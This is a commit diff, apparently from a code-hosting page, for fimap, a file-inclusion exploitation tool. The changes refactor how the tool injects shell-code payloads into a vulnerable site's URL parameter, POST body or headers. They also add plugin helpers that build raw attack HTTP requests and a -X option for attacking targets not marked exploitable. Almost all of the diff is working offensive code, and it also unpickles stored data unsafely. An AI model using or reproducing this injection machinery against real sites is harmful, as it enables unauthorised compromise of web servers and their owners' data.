Commit 3d2fb9b6 authored by fimap.dev@gmail.com's avatar fimap.dev@gmail.com

Some additions to the plugin engine.

parent cd67b770
......@@ -26,6 +26,7 @@ import sys
from baseClass import baseClass
from config import settings
import urllib2
import urlparse
__author__="Iman Karim(ikarim2s@smail.inf.fh-brs.de)"
__date__ ="$03.09.2009 03:40:49$"
......@@ -47,10 +48,55 @@ class codeinjector(baseClass):
def setReport(self, report):
self.report = report
def start(self):
domain = self.chooseDomains()
vuln = self.chooseVuln(domain.getAttribute("hostname"))
def getPreparedComponents(self, shcode=None):
fpath = None
postdata = None
header_dict = []
vuln = self.vulnerability;
fpath = vuln.getAttribute("path")
param = vuln.getAttribute("param")
prefix = vuln.getAttribute("prefix")
suffix = vuln.getAttribute("suffix")
if (shcode == None):
shcode = vuln.getAttribute("file")
paramvalue = vuln.getAttribute("paramvalue")
postdata = vuln.getAttribute("postdata")
ispost = int(vuln.getAttribute("ispost"))
isUnix = vuln.getAttribute("os") == "unix"
vulnheaderkey = vuln.getAttribute("header_vuln_key")
header_dict_b64 = vuln.getAttribute("header_dict")
header_dict = {}
if (header_dict_b64 != ""):
header_dict_pickle = b64decode(header_dict_b64)
header_dict = pickle.loads(header_dict_pickle)
if (not isUnix and shcode[1]==":"):
shcode = shcode[3:]
payload = "%s%s%s" %(prefix, shcode, suffix)
if (ispost == 0):
fpath = fpath.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, payload))
elif (ispost == 1):
postdata = postdata.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, payload))
elif (ispost == 2):
tmp = header_dict[vulnheaderkey]
tmp = tmp.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, payload))
header_dict[vulnheaderkey] = tmp
return(fpath, postdata, header_dict, payload)
def start(self, OnlyExploitable):
domain = self.chooseDomains(OnlyExploitable)
vuln = self.chooseVuln(domain.getAttribute("hostname"))
self.vulnerability = vuln;
hostname = domain.getAttribute("hostname")
mode = vuln.getAttribute("mode")
fpath = vuln.getAttribute("path")
......@@ -84,15 +130,7 @@ class codeinjector(baseClass):
plugman = self.config["PLUGINMANAGER"]
if (kernel == ""): kernel = None
payload = "%s%s%s" %(prefix, shcode, suffix)
if (ispost == 0):
fpath = fpath.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, payload))
elif (ispost == 1):
postdata = postdata.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, payload))
elif (ispost == 2):
tmp = header_dict[vulnheaderkey]
tmp = tmp.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, payload))
header_dict[vulnheaderkey] = tmp
fpath, postdata, header_dict, payload = self.getPreparedComponents()
php_inject_works = False
sys_inject_works = False
working_shell = None
......@@ -867,4 +905,46 @@ class HaxHelper:
else:
break
f.close()
return(ret)
\ No newline at end of file
return(ret)
def getURL(self):
return self.url
def getHaxDataForCustomFile(self, file):
return(self.parent_codeinjector.getPreparedComponents(file))
def doRequest(self, URL, POST=None, HEADERS=None):
return(self.parent_codeinjector.doPostRequest(URL, POST, additionalHeaders=HEADERS))
def getRawHTTPRequest(self, customFile):
path, post, header, payload = self.parent_codeinjector.getPreparedComponents(customFile)
hasPost = post != None and post != ""
host = urlparse.urlsplit(self.url)[1]
ret = ""
if (not hasPost):
ret = "GET %s HTTP/1.1\r\n" %(path)
else:
ret = "POST %s HTTP/1.1\r\n" %(path)
ret += "Host: %s\r\n" %(host)
if header.has_key("Cookie"):
ret += "Cookie: "
for k,v in header["Cookie"]:
ret += "%s: %s;" %(k,v)
ret += "\r\n"
if (hasPost):
ret += "Content-Type: application/x-www-form-urlencoded\r\n"
ret += "Content-Length: %d\r\n"%(len(post))
ret += "\r\n"
ret += "%s\r\n" %(post)
ret += "\r\n"
return(ret)
def drawBox(self, header, choises):
self.parent_codeinjector.drawBox(header, choises)
\ No newline at end of file
......@@ -117,6 +117,8 @@ def show_help(AndQuit=False):
print "## Attack Kit:"
print " -x , --exploit Starts an interactive session where you can"
print " select a target and do some action."
print " -X Same as -x but also shows not exploitable which might can be"
print " hax0red with plugins."
print " -T , --tab-complete Enables TAB-Completation in exploit mode. Needs readline module."
print " Use this if you want to be able to tab-complete thru remote"
print " files\dirs. Eats an extra request for every 'cd' command."
......@@ -203,13 +205,13 @@ def show_ip():
print result.strip()
sys.exit(0)
def list_results(lst = os.path.join(os.path.expanduser("~"), "fimap_result.xml")):
def list_results(lst = os.path.join(os.path.expanduser("~"), "fimap_result.xml"), onlyExploitable=True):
if (not os.path.exists(lst)):
print "File not found! ~/fimap_result.xml"
sys.exit(1)
c = codeinjector(config)
c.start()
c.start(onlyExploitable)
sys.exit(0)
......@@ -290,9 +292,10 @@ if __name__ == "__main__":
"googlesleep=" , "dot-truncation", "dot-trunc-min=", "dot-trunc-max=", "dot-trunc-step=", "dot-trunc-ratio=",
"tab-complete" , "cookie=" , "bmin=" , "bmax=" , "dot-trunc-also-unix", "multiply-term=",
"autoawesome" , "force-run" , "force-os=" , "rfi-encoder=", "header=", "bing"]
optlist, args = getopt.getopt(sys.argv[1:], "u:msl:v:hA:gq:p:sxHw:d:bP:CIDTM:4R:B", longSwitches)
optlist, args = getopt.getopt(sys.argv[1:], "u:msl:v:hA:gq:p:sxXHw:d:bP:CIDTM:4R:B", longSwitches)
startExploiter = False
showOnlyExploitable = True
for k,v in optlist:
if (k in ("-u", "--url")):
......@@ -351,6 +354,9 @@ if __name__ == "__main__":
doInternetInfo = True
if (k in("-x", "--exploit")):
startExploiter = True
if (k in("-X",)):
startExploiter = True
showOnlyExploitable = False
if (k in ("-P", "--post")):
config["p_post"] = v
if (k in ("--no-auto-detect", )):
......@@ -444,7 +450,7 @@ if __name__ == "__main__":
if startExploiter:
try:
list_results()
list_results(onlyExploitable=showOnlyExploitable)
except KeyboardInterrupt:
print "\n\nYou killed me brutally. Wtf!\n\n"
sys.exit(0)
......@@ -464,9 +470,9 @@ if __name__ == "__main__":
# Get generic.xml from SVN repository and parse out its version.
generic_xml_online = tester.doGetRequest(defupdateurl + "generic.xml")
if generic_xml_online == None:
if generic_xml_online == None:
print "Failed to check generic_xml. Are you online?"
sys.exit(1)
sys.exit(1)
tmpFile = tempfile.mkstemp()[1] + ".xml"
f = open(tmpFile, "w")
......@@ -514,9 +520,9 @@ if __name__ == "__main__":
tester = codeinjector(config)
result = tester.doGetRequest(pluginlist)
if result == None:
print "Failed to request plugins! Are you online?"
sys.exit(1)
if result == None:
print "Failed to request plugins! Are you online?"
sys.exit(1)
choice = {}
idx = 1
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment